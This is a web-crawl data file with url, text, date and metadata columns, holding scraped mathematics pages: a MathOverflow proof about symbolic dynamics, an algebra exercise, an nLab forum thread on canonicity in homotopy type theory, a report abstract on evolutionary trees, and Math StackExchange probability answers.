url
stringlengths
14
2.42k
text
stringlengths
100
1.02M
date
stringlengths
19
19
metadata
stringlengths
1.06k
1.1k
http://mathoverflow.net/questions/107048/relative-irreducibility?sort=votes
# Relative irreducibility Let $X$ be a one-dimensional one-step irreducible shift of finite type and let $\pi$ be a one-block factor code from $X$ to a sofic $Y$. Suppose $y$ is a right transitive point of $Y$ and $\pi(u)=y$ for some $u\in X$. Given $u_0=a$ and a block $B$ of $X$, is there a point $x\in\pi^{-1}(y)$ such that $x_0=a$ and $B$ occurs in $x_{[0,\infty)}$? (Note that the stronger statement is true when $\pi$ is a finite-to-one code: a point is transitive if and only if it's image under $\pi$ is transitive, so $B$ actually occurs infinitely often in the right of $x$.) Thanks to the helpers. - Sorry that this is slightly technical... It's uses some concepts that Mahsa showed me in answering a more simple question that I asked her. Using results from http://arxiv.org/abs/1001.5323v1, we may assume that there exists a 'magic symbol' $k\in Y$ satsisfying that for any word $y_m\cdots y_n\in Y$ with $y_m=y_n=k$, we have that any word $x_m\cdots x_n\in X$ with $\pi(x_m\cdots x_n)=(y_m\cdots y_n)$ can be extended to a sequence $x\in X$ with $\pi(x)=y$. This is not actually the definition of magic symbol but a theorem about them, see the above paper for a definition. We assume that the desired word $B$ in $X$ starts and finishes with elements of $\pi^{-1}(k)$, if not we just extend the word $B$ a little bit. We let $B=b_1\cdots b_m$ and $C=\pi(B)$. Let $A=\{a^1,\cdots,a^j\}$ be the set of possible values of $x_1$ for words $x_1\cdots x_m$ with $\pi(x_1\cdots x_m)=C$. Clearly $b_1\in A$, we let $a^1=b_1$. We begin with the following lemma: \begin{lemma} There exists a word $W=w_1\cdots w_n$ in $Y$ with $w_1=w_n=k$ such that for each $a\in A$ there exists a word $V=v_1\cdots v_n\in X$ with $\pi(V)=W$, $V$ contains $B$ and $v_1=a$. \end{lemma} To prove the lemma we define $W=w_1\cdots w_{i_j}$ in chunks which deal with the possible values of $v_1\in A$. We let $w_1\cdots w_{i_1}$ be the word $C$. Then for $v_1=a^1$ we are done, since $B$ is a preimage of $C$ which starts with $a^1$. Since $B$ starts and finishes with elements of $\pi^{-1}(k)$ it can be extended to a sequence $x$ projecting to $y$. Now we deal with $a^2$. By the definition of $A$, there exists a preimage of $C$ starting with $a^2$. By the transitivity of $X$, this preimage, which is a finite word in $X$, can be extended to be another finite word in $x_1\cdots x_{i_2}\in X$ which finishes with word $B$. We let $w_1\cdots w_{i_2}=\pi(x_1\cdots x_{i_2})$, noting that $i_2>i_1$ and $\pi(x_1\cdots x_{i_1})=w_1\cdots w_{i_1}$, so there is no conflict with the values of $W$ which we already defined. Now we do the same trick for $a^3$. There is a preimage of $w_1\cdots w_{i_1}$ $(=c_1\cdots c_m)$ starting with $a^3$, and hence there must be a preimage of $w_1\cdots w_{i_2}$ starting with $a^3$, because $w_1, w_{i_1}$ and $w_{i_2}$ are all equal to the magic symbol $k$. Let $x_1\cdots x_{i_2}$ be this word, and because $X$ is transitive we can extend it to a finite word $x_1\cdots x_{i_3}$ in $X$ finishing with block $B$. Let $w_1\cdots w_{i_3}=\pi(x_1\cdots x_{i_3})$. We continue this process until we have a word $W=w_1\cdots w_{i_j}$, this word $W$ satisfies the conditions of the lemma, so the lemma is proved. Now let $y\in Y$ be a transitive sequence. Then $y$ contains the word $W$, say $y_l\cdots y_{l+i_j}=W$. For our desired starting symbol $u$ there exists a word $x_1\cdots x_l$ with $x_1=u$ and $\pi(x_1\cdots x_l)=y_1\cdots y_l$, since there exists a preimage of $y$ starting with $u$. $x_l$ will be some member of $A$, and then using the lemma we can extend $x_1\cdots x_l$ to a sequence which contains $B$ and projects to $y$ as required. -
2014-12-20 18:43:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.95584636926651, "perplexity": 66.92765247416718}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-52/segments/1418802770130.120/warc/CC-MAIN-20141217075250-00120-ip-10-231-17-201.ec2.internal.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/introductory-algebra-for-college-students-7th-edition/chapter-2-section-2-2-the-multiplication-property-of-equality-exercise-set-page-130/44
## Introductory Algebra for College Students (7th Edition) $z=3$ $2z=-4z+18$ First add 4z to both sides. $2z+4z=18$ $6z=18$ Then divide both sides by 6. 6z$\div$6=18$\div$6 $z=3$ Check the answer. 2(3)=-4(3)+18 6=-12+18 6=6
2018-09-23 23:37:15
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7838202118873596, "perplexity": 6350.067929750566}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267159938.71/warc/CC-MAIN-20180923232129-20180924012529-00363.warc.gz"}
https://nforum.ncatlab.org/discussion/4165/
# Start a new discussion ## Not signed in Want to take part in these discussions? Sign in if you have an account, or apply for one below ## Site Tag Cloud Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support. • CommentRowNumber1. • CommentAuthorUrs • CommentTimeSep 4th 2012 added to canonical form references (talk notes) on canonicity or not in the presence of univalence • CommentRowNumber2. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016 • (edited May 5th 2016) With my workshop happening, I seem to keep hearing about the delights of canonicity. Coming from the category theoretic side, what’s the deal with it? Do I understand from this in the HoTT book This construction of the free monoid is possible essentially because elements of the free monoid have computable canonical forms (namely, finite lists). However, elements of other free (and presented) algebraic structures — such as groups — do not in general have computable canonical forms. For instance, equality of words in group presentations is algorithmically undecidable. However, we can still describe free algebraic objects as higher inductive types, by simply asserting all the axiomatic equations as path constructors. that canonicity goes as soon as we do any non-trivial algebra. So why should I care? Two specific questions: Is it that as soon as we have HITs with a path constructor that we lose canonicity? In the example on canonical form where it shows how a use of univalence gets stuck, was the function from $\mathbb{N}$ to itself chosen just as an example of a non-identity isomorphism? • CommentRowNumber3. • CommentAuthorzskoda • CommentTimeMay 5th 2016 • CommentRowNumber4. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016 Thanks! Fixed now. • CommentRowNumber5. • CommentAuthorMike Shulman • CommentTimeMay 5th 2016 canonicity goes as soon as we do any non-trivial algebra Well, most nontrivial algebraic structures, like groups, rings, and so on are defined the way they are for other (perfectly good) reasons, and not with canonicity or computation in mind. So it’s not surprising that free algebras don’t have canonical forms. But when we view type theory as an “algebraic theory” of sorts, then it is usually constructed so as to be “computable” and therefore to have canonical forms, even though it is of course highly nontrivial (and the proof that it does have canonical forms is likewise highly nontrivial). Is it that as soon as we have HITs with a path constructor that we lose canonicity? The way HITs are currently defined in “Book HoTT” as well as in Coq, Agda, and Lean, yes. Cubical type theory can handle at least some HITs while retaining canonicity. In the example on canonical form where it shows how a use of univalence gets stuck, was the function from $\mathbb{N}$ to itself chosen just as an example of a non-identity isomorphism? Yes. I don’t know why that example was chosen; there are much simpler nonidentity isomorphisms like $swap:2\to 2$. • CommentRowNumber6. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016 • (edited May 5th 2016) Thanks! Cubical type theory can handle at least some HITs while retaining canonicity. What of is_inhab$(A)$, where $A$ has canonical elements? • CommentRowNumber7. • CommentAuthorMike Shulman • CommentTimeMay 5th 2016 You mean the propositional truncation? Yes, that’s one of the ones they do. • CommentRowNumber8. • CommentAuthorDavid_Corfield • CommentTimeMay 5th 2016 Yes, great. Where do they do this? Who are ’they’ anyway? • CommentRowNumber9. • CommentAuthorMike Shulman • CommentTimeMay 5th 2016 One “they” is Thierry Coquand and his coauthors: the propositional truncation is on p20 of this paper. Dan Licata and Guillaume Brunerie were independently working on a cubical type theory for at least a while, but I don’t think they’ve actually posted a writeup yet; the slides available on Dan’s web site don’t mention the truncation. The recent Angiuli-Harper-Wilson paper also doesn’t mention truncation explicitly. But I’m sure that it will work just about as well in all versions. • CommentRowNumber10. • CommentAuthorDavid_Corfield • CommentTimeMay 6th 2016 Thanks. It’s p.25 of the Coquand et al. paper if anyone’s looking. • CommentRowNumber11. • CommentAuthorUrs • CommentTimeMay 6th 2016 Despite having heard various talks about it, I keep being uncertain as to what the claim regarding cubical type theory and univalence really is. It sounds as if the following is claimed: “In principle it is possible to take any proof in book HoTT that uses univalence and systemaically turn it into a program that computes.” Has this been proven? • CommentRowNumber12. • CommentAuthorMike Shulman • CommentTimeMay 6th 2016 I’m not the best person to answer that, since I have trouble keeping up with all the different cubical theories and exactly what has and hasn’t been done (and I have to admit that keeping up with all of them is not high on my priority list). That’s certainly the goal (although “program that computes” has to be taken with a grain of salt — only a term belonging to a type like nat or bool will actually compute a “value” in the ordinary sense), and a lot of progress has been made. But there have been various technical issues that I don’t know whether have all been dealt with at once, regarding things like whether the rules for paths in the universe (univalence) can be consistently defined at all levels, and whether Id-elim satisfies its computation rule judgmentally or only typally. • CommentRowNumber13. • CommentAuthorspitters • CommentTimeMay 14th 2016 One such result is here it also refers to a proof of canonicity for by the cubical team, which hopefully will be published shortly.
2021-09-20 20:51:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 5, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7330725193023682, "perplexity": 1909.8131902029584}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057091.31/warc/CC-MAIN-20210920191528-20210920221528-00347.warc.gz"}
http://pubman.mpdl.mpg.de/pubman/faces/viewItemOverviewPage.jsp?itemId=escidoc:1825059
de.mpg.escidoc.pubman.appbase.FacesBean Deutsch Hilfe Wegweiser Impressum Kontakt Einloggen # Datensatz DATENSATZ AKTIONENEXPORT Freigegeben Bericht #### On the complexity of computing evolutionary trees ##### MPG-Autoren http://pubman.mpdl.mpg.de/cone/persons/resource/persons44478 Gasieniec,  Leszek Algorithms and Complexity, MPI for Informatics, Max Planck Society; ##### Externe Ressourcen Es sind keine Externen Ressourcen verfügbar ##### Volltexte (frei zugänglich) 1996-1-031 (beliebiger Volltext), 11KB ##### Ergänzendes Material (frei zugänglich) Es sind keine frei zugänglichen Ergänzenden Materialien verfügbar ##### Zitation Gasieniec, L., Jansson, J., Lingas, A., & Östlin, A.(1996). On the complexity of computing evolutionary trees (MPI-I-1996-1-031). Saarbrücken: Max-Planck-Institut für Informatik. In this paper we study a few important tree optimization problems with applications to computational biology. These problems ask for trees that are consistent with an as large part of the given data as possible. We show that the maximum homeomorphic agreement subtree problem cannot be approximated within a factor of $N^{\epsilon}$, where $N$ is the input size, for any $0 \leq \epsilon < \frac{1}{18}$ in polynomial time, unless P=NP. On the other hand, we present an $O(N\log N)$-time heuristic for the restriction of this problem to instances with $O(1)$ trees of height $O(1)$, yielding solutions within a constant factor of the optimum. We prove that the maximum inferred consensus tree problem is NP-complete and we provide a simple fast heuristic for it, yielding solutions within one third of the optimum. We also present a more specialized polynomial-time heuristic for the maximum inferred local consensus tree problem.
2017-03-26 11:03:38
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7604486346244812, "perplexity": 2848.790523814351}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189214.2/warc/CC-MAIN-20170322212949-00553-ip-10-233-31-227.ec2.internal.warc.gz"}
http://math.stackexchange.com/tags/random-variables/new
# Tag Info 1 To find the p.d.f of the ratio $\frac{Y}{X+Y}$, let us first write its c.d.f. Since $X$ and $Y$ are always positive, their ratio is also positive and, therefore, for $0\leq t\lt1$ we can write: $P\left(\frac{Y}{X+Y}\leq t\right)=P\left(Y\leq \frac{t}{1-t}X\right)=\int_{0}^{\infty }\left(\int_{0}^{\frac{t}{1-t}x}f_{X}(x)f_{Y}(y)dy\right)dx$ as ... 0 You know that $K$ of the $2N$ computers were checked until the $N$-th of one version was found.   Thus the $K$-th computer is of that type, and $0\leq K{-}N < N \leq K < 2N$. Now the probability of selecting $N{-}1$ of $N$ computers of one version, and $k-N$ of the $N$ computers of the other, in any order, then selecting the $1$ remaining ... 1 For any positive integer $n$, we have $T_n-S_n = g(T_n,S_n)$ where $g:\mathbb R^2\to \mathbb R$ is the map $(x,y)\mapsto x-y$. Given $t\in\mathbb R$, it is clear that $$g^{-1}((-\infty,t]) = \{(x,y):x-y\leqslant t\}$$ is a Lebesgue-measurable set in $\mathbb R^2$, and so $g$ is a measurable function. Since $\sigma(g(T_n,S_n))\subset \sigma(T_n,S_n)$, ... 0 Let $\mu=E(X)$. Then $cov(X)=E(XX^T)-\mu\mu^T$ and $cov(AX)=E((AX)(AX)^T)-(A\mu)(A\mu)^T=A(E(XX^T)-\mu\mu^T)A^T=Acov(X)A^T$. 2 For $x>1$, we have $$\mathbb P(\xi_n\leqslant x) = \mathbb P\left(\bigcap_{i=1}^n \left\{\eta_i\leqslant x\right\}\right)=\prod_{i=1}^n\mathbb P\left(\eta_i\leqslant x \right) = \left(1 - x^{-\alpha}\right)^n.$$ Hence \begin{align} \mathbb P(\zeta_n\leqslant x) &= \mathbb P\left(\xi_n n^{-\frac1\alpha}\leqslant x\right)\\ &= \mathbb ... 0 We first do it more or less in the way you attempted. There are $\binom{10}{7}$ equally likely ways to choose $7$ wines. First we find the number of ways to choose $0$ Pinks. There is only one way, so $\Pr(Y=0)=\frac{1}{\binom{10}{7}}$. For the future, note that this is $\frac{\binom{3}{0}\binom{7}{7}}{\binom{10}{7}}$. So now we know $\Pr(Y=0)$. Next we ... 0 Close, but a few details need attention. Assuming the selection is unbiased and without repetition, then the probability of choosing $y$ of $3$ white wines, and $7-y$ of $7$ not white wines, out of all the ways to choose $7$ of $10$ wines is: $$\Pr(Y=y) \;=\; \mathbf 1_{y\in\{0,1,2,3\}}\cdot{\dbinom{3}{y}\dbinom{7}{7-y}}\Big/{\dbinom{10}{7}}$$ So the ... 1 Notice that because of independence: $$P\left(X^2 < \frac{1}{2}, |Y| < \frac{1}{2} \right) = P\left(X^2 < \frac{1}{2}\right) P\left(|Y| < \frac{1}{2} \right)$$ Analyzing the $X$ term: P\left(X^2 < \frac{1}{2}\right) = P \left( -\frac{1}{\sqrt{2}} < X < \frac{1}{\sqrt{2}} \right) = ... 0 If $Z\sim\text{unif}(-1,1),$then $$f_{|Z|}(z) = 1.$$ You can take this to mean that $|Z|\sim\text{unif}(0,1)$. In your case $$P(X^2<1/2,|Y|<1/2) = P(|X|<1/\sqrt 2)\cdot P(|Y|<1/2) = (1/\sqrt 2)(1/2),$$ since $X$ and $Y$ are independent. 2 Since $X$ and $Y$ are independent, we have $$\Pr[(X^2 \le 1/2) \cap (|Y| \le 1/2)] = \Pr[X^2 \le 1/2]\Pr[Y \le 1/2].$$ Since they are uniform on $[-1,1]$, we then have $$\Pr[X^2 \le 1/2] = \Pr[-1/\sqrt{2} \le X \le 1/\sqrt{2}] = \frac{1/\sqrt{2} - (-1/\sqrt{2})}{1 - (-1)} = \frac{1}{\sqrt{2}},$$ and $$\Pr[|Y| \le 1/2] = \Pr[-1/2 \le Y \le 1/2] = ... 2 Hint: X^2< \frac12\iff |X|<\frac1{\sqrt2}. If X and Y are independent, then |X| and |Y| are also independent. Complete the sentence: if A and B are independent, then P(A, B) = ... 0 You're wrong with your initial assumption. Actually, we have$$P (X_n = k) = \frac {6 - |k - 7|} {36}.$$Also, the probability you ask for is the sum$$\sum_{k = 1}^{12} (P(X_n = k)^2) = \sum_{k = 1}^{12} \left ( \frac {6 - |k - 7|} {36} \right )^2 = \frac {1} {1296} \sum_{k = 1}^{12} (36 + (k - 7)^2 - 12 |k - 7|) = \frac {12 \cdot 36 + 146 - 12 \cdot 36} ... 0 Hints: $\mathbb EX=P(X\geq1)+\dots+P(X\geq N)$ $P(X\geq k+1)+P(X\leq k)=1$ edit: $$\mathbb{E}X=\sum_{i=1}^{N}ip_{i}=\sum_{i=1}^{N}\sum_{k=1}^{i}p_{i}=\sum_{k=1}^{N}\sum_{i=k}^{N}p_{i}=\sum_{k=1}^{N}P\left(X\geq k\right)=$$$$\sum_{k=1}^{N}\left(1-P\left(X\leq k-1\right)\right)=N-\sum_{k=1}^{N}P\left(X\leq k-1\right)=N-\sum_{k=n}^{N-1}P\left(X\leq ... 1 The answer to your first question is yes: if c \ne 0 and c \in \mathbb R, then cX \sim \operatorname{Normal}(c\mu, |c|\sigma) if X is normal with mean \mu and standard deviation \sigma. This is because the normal distribution belongs to a location-scale family: its PDF is$$f_X(x) = \frac{1}{\sqrt{2\pi}\sigma} e^{-(x-\mu)^2/(2\sigma^2)}, \quad ... 0 The answer is negative. If $(r_n)$ is lacunary sequences (that is $r_{n+1}>ar_n$ for some $a>1$), then for any probability preserving transformation $T\colon X\to X$ and any $\delta>0$ there is $A\subset X$ with $0<\mu(A)<\delta$ such that $$\limsup_n \frac{1}{n} \sum_{k=0}^{n-1} \chi_A (T^{r_k}x)=1 \quad \text{ for a.e. x\in X.}$$ Akcoglu ... 1 The probability of extinction is the smallest positive root of $$G_O(z)=z$$ Where $O$ denotes the offspring distribution, and $G_O(z)$ its generating function at $z$. It is easily seen that $G_O(0)$ is the probability of extinction in the first generation. Second, if you know about generating functions, then you know that the sum: , where $X$ is ... 2 For any $p \geq 1$, we have $$|x+y|^p \leq 2^p (|x|^p+|y|^p),$$ and therefore \begin{align*} \mathbb{E}(|X_n-X|^p \mid \mathcal{F}) &\leq 2^p \mathbb{E}(|X_n|^p \mid \mathcal{F}) + 2^p \mathbb{E}(|Y|^p \mid \mathcal{F}) \\ &\leq 2^p \mathbb{E}(|X|^p \mid \mathcal{F}) + 2^p \mathbb{E}(|Y|^p \mid \mathcal{F}). \end{align*} This shows that ... 0 Just to be clear: The expectation of an Indicator Random Variable is the probability of it being 1. \begin{align}\mathsf E(X_i) & = 0\cdot \mathsf P(X_i=0)+1\cdot \mathsf P(X_i=1)\\ & = \mathsf P(X_i=1)\end{align} $X_i$ is the indicator that red ball #$i$, for $i\in\{1..10\}$, is one of the $12$ out of $30$ balls drawn. Imagine we lay the ... 1 As $0 \leq a, \bar{a} \leq 1$, we have $$(a-\bar{a})(a + \bar{a}) \leq |(a-\bar{a})(a+\bar{a})| = |a-\bar{a}| \cdot \underbrace{|a+\bar{a}|}_{= a+\bar{a} \leq 2}.$$ Taking expectation on both sides, proves the inequality. 1 $$E[(a-\bar{a})(a+\bar{a})]\leq E[|a-\bar{a}|(a+\bar{a})]\leq 2E[|a-\bar{a}|],$$ where the second inequality follows from the fact that $(a+\bar{a})\leq 2$. 1 No, there is nothing to be said about the Cesàro averages of the whole sequence. They can be as bad as the sequence itself. Indeed, given any weakly convergent sequence $\{f_n\}$, we can consider another sequence $\{g_n\}$ defined as $$f_1,f_1, f_2,f_2,f_2,f_2, f_2,f_2,f_2,f_2, f_2,f_2,f_2,f_2, f_2,f_2,f_2,f_2, f_3, \dots$$ where the term $f_n$ appears ... -1 Important inequalities (Probability w/ Martingales): 1, 2 $$\liminf x_n > z \to \liminf(x_n > z)$$ $$\liminf x_n < z \to \limsup(x_n < z)$$ 'if' Suppose $\forall \epsilon>0$, $$\sum_{n=1}^{\infty}\textrm{P}\left(\left|X_{n}\right|>\epsilon\right)<\infty$$ By BCL1, we have $$\textrm{P}\left(\limsup ... 0 For the employer to know the order in which the computers were checked, he must have been noting the first computer as version A and the first computer with a different version than A as B and then forgetting what version A and B correspond to. An example of a sample path of him noting: A, A, B, A, B, B, A, ... When he has N of the same system ... 1 Suppose that we have some points y_{1},y_{2},\dots,y_{n} and we have the model$$y_{i}=x_{i}^{T}\beta+\xi_{i}where the \xi_{i} are i.i.d. \mathcal{N}(0,\sigma^{2}) noise terms, \beta\in\mathbb{R}^{p} and x_{i}\in\mathbb{R}^{p}. This can be rewritten as y=X^{T}\beta+\xi where the columns of X are x_{1},\dots,x_{n} and \xi is a ... 0 Note that we have \begin{align*} \def\E{\mathbf E}\E[y^* C_{yy}^{-1}y] &= \E\left[\sum_{i,j} \bar y_i \bigl(C_{yy}^{-1}\bigr)_{ij} y_j\right]\\ &= \sum_{i,j} \bigl(C_{yy}^{-1}\bigr)_{ij} \E[\bar y_i y_j]\\ &= \sum_{i,j} \bigl(C_{yy}^{-1}\bigr)_{ij} \bigl(C_{yy}\bigr)_{ji}\\ &= \operatorname{tr} C_{yy}^{-1}C_{yy}\\ &= n. ... 1 It is a standard result in measure theory that for nonnegative functions f\int_A f d \mu = \lim_{n \to \infty} n \mu(f^{-1}([n,\infty)) + \sum_{k=1}^{n^2-1} \frac{k}{n} \mu(f^{-1}([k/n,(k+1)/n)).$$(The details of the partitioning are not so important; the important matter is that the mesh size goes to zero and the upper bound goes to infinity.) For ... 1 \int_{-\infty}^\infty\int_{-\infty}^yf(x,y)\;\;dx\;dy 0 Yes, we will have to divide into cases. There are two uninteresting cases, (i) y\le 0 and (ii) y\ge 2. If y\le 0, then F_Y(y)=\Pr(Y\le y)=0. If y\ge 2 then \Pr(Y\le y)=1. The other two cases are (iii) 0\le y\le 1 and (iv) 1\lt y\lt 2. Case (iii): We have Y\le y if and only if -y\le X\le y. The density function of X on the interval ... 0 You were on the right track. The only problem with your solution is that you don't take in consideration that P(Y<1∣X<1)=1 since 0<y<x. If you take that into consideration, you will find:$$\ P(Y\lt 1) = \int_{0}^{3} P(Y \lt1 \mid X = x) \ f_x(x) \ dx\ P(Y\lt 1) = \int_{0}^{1} 1* \ f_x(x) \ dx + \int_{1}^{3} P(Y \lt1 \mid X = x) \ ... 0 I believe the abuse of notation which is causing the confusion involves the notion of the preimage of an element of the codomain of the random variable. https://en.wikipedia.org/wiki/Image_(mathematics) Consider fact 2.13 without the abuse of notation. Let $X$ be a random variable on $S$. Then E(X) = \sum\limits_{x \in \mathbb{R}}x ... 0 If $g$ denotes the conditional PDF then it is prescribed by $x\mapsto\frac{32}{15}x$ if $\frac14<x<1$ and $x\mapsto0$ otherwise. $$P(X>\frac34|Y=\frac14)=\int\chi_{(\frac34,\infty)}g(x)dx=\int_{\frac34}^1\frac{32}{15}xdx$$ 1 When you calculate a function (here $f_{X\mid Y=1/4}$) try always writting also its domain. Here the domain of $f_{X\mid Y=1/4}$ is: $$f_{X\mid Y=1/4}(x \mid 1/4)=\begin{cases}\frac{32}{15}x, & 1/4<x<1 \\0, & \text{else } \end{cases}$$ Now you see that $$P(X >3/4 \mid Y=1/4)=\int_{3/4}^{1}\frac{32}{15}x\ dx$$ 2 We have $$E(X^2)=\int_0^\infty x^2 \lambda e^{-\lambda x}dx=\frac{2}{\lambda^2}$$ So, $$Var(X)=E(X^2)-E(X)^2=\frac{2}{\lambda^2}-\frac{1}{\lambda^2}=\frac{1}{\lambda^2}$$ 1 No, there's no need to calculate the density of $V$.   Don't make unnecessary work for yourself. You have $X \sim \mathcal U\{0,1,2,3,4,5\}$, and $R\sim\mathcal U(0.04;0.08)$ and that $X$ and $R$ are independent. You want to calculate $\mathsf E(X \,\mathsf e^{2R})$.   That is: $$\mathsf E(X\, \mathsf e^{2R}) = \sum_{x=0}^5 ... 1 One step at a time. First step. If 0 \lt X^2 then \frac 1{X^2}\lt \infty . Because the inverse of every positive number is a finite number. Second step. If 0 < X^2\leq 1 then 1\leq \frac{1}{X^2}. Because the inverse of every positive number no greater than one must be a positive number no lesser than one. Put it ... 0 Hint: If X=aY+b then how are X^* and Y^* related? 0 I agree that the assertion looks a little odd, but it is correct. Using your analysis, we have that$$\Pr(X\le k\le \alpha X)=\Pr\left(X\ge \frac{k}{\alpha}\right)-\Pr(k\le X).$$(Note the correction in the second term.) The first term on the right is then 1-\Pr(X\le \frac{k}{\alpha}) and the second term is 1-\Pr(k\ge x). Subtract and note the ... 1 Outline: Let a be the probability that a randomly chosen female Smurf is between 1 and 1.3, and let b be the corresponding probability for male Smurfs (Smurves?). Then our required probability is (0.6)a+(0.4)b. 0$$P\{ Y \le y\} = P\left\{\frac{1}{Z}\le y\right\} = P\left\{Z \ge \frac{1}{y}\right\} = \int_{1/y}^\infty f_Z(z)\mathrm{d}z\implies f_Y(y) = \frac{\partial}{\partial y} P\{Y \le y\} = \frac{1}{y^2} f_Z(1/y)$$Alternatively, recall that densities of transformed random variables are in the ratio of the Jacobian of the transformation.$$z = ... 0 The change of variables formula is (from the chain rule): \begin{align} f_{g(Z)}(y) & = f_Z(g^{-1}(y)) \cdot \lvert \mathcal D_y\; g^{-1}(y)\rvert & \textrm{where g(z) is an invertable function} \\[2ex] f_Y(y) & = f_Z(1/y)\cdot\left\lvert\dfrac{\operatorname d y^{-1}}{\operatorname d y\quad}\right\rvert & \textrm{since g(z)=1/z} ... 1 By the properties of a continuous density, \mathbb P(0 < Y \le b) = \int_0^b f_Y(y) \, dy. $$Therefore, for Y = 1/Z,$$ \mathbb P(0 < Y \le y) = \mathbb P(Z \ge 1/y) = \int_{1/y}^{\infty} f_Z(z) \, dz = 1/2 - \int_0^{1/y} f_Z(z) \, dz. $$Differentiating with respect to y to recover Y's density,$$ f_Y(y) = \frac d{dy} \left( 1/2 - ... 0 Hint: If $B$ is an event in $F$ and $g:\Bbb R\to\Bbb R$ is bounded and continuous, then $\Bbb E[1_Bg(X)]=\lim_{n\to\infty}\Bbb E[1_Bg(X_n)]$. [For this you need to know that convergence in probability is preserved by composition with continuous functions.] 0 HINT: I'll go ahead and give you a hint on part A since you haven't shown much effort or thought in searching for an answer. What's your expected location? The average distance you would have to walk to either bus stop should be total possible distance minus your expected distance. 0 For your first question, we have $$P\left(X^2\leq y\right)$$ $$=P\left(\sqrt{X^2}\leq \sqrt y\right)$$ $$=P\left(\left|X\right|\leq \sqrt y\right)$$ $$=P\left(−\sqrt{y}\leq X\leq\sqrt{y}\right)$$ For your second question, we have $$-1\lt x\lt 1$$ Which can be rewritten as $$\left|x\right|\lt 1$$ Or $$0\leq\left|x\right|\lt 1$$ Have a look at absolute value. 1 $Z$ is nonnegative so $f_{Z}\left(x\right)=0$ if $x<0$. For $x\geq0$ we have: $$F_{Z}\left(x\right)=F_{X}\left(\sqrt{x}\right)-F_{X}\left(-\sqrt{x}\right)$$ Consequently: ... 0 While Ákos Somogyi's answer is correct, this is not the best approach to solve this kind of problem. There is a transformation of density formula, which says that if $X$ has density $f_X$ and $h$ is piecewise continuously differentiable and piecewise strictly monotone, then $Y$ has the density $$f_Y(y) = \sum_{x: h(x) = y} \frac{f_X(x)}{|h'(x)|}. \tag{1} ... 1$$ \mathbb{P}(X\in[-\sqrt{z},\sqrt{z}])=\mathbb{P}(X<\sqrt{z})-\mathbb{P}(X>-\sqrt{z})=\boxplus $$Now since X in uniform on [-1,2], the CDF of it is:$$ F_X(x)=\chi_{x\in(2,\infty)}+\frac{1}{3}(x+1)\chi_{x\in[-1,2]} $$THus by taking the range into consideration, we obtain:$$ ... 0 Since you said you've enumerated the outcomes for $X$, do the same for $Z$. Below I made a table for the values of both $X$ and $Z$. Can you now make the corresponding table for $W = XZ$? 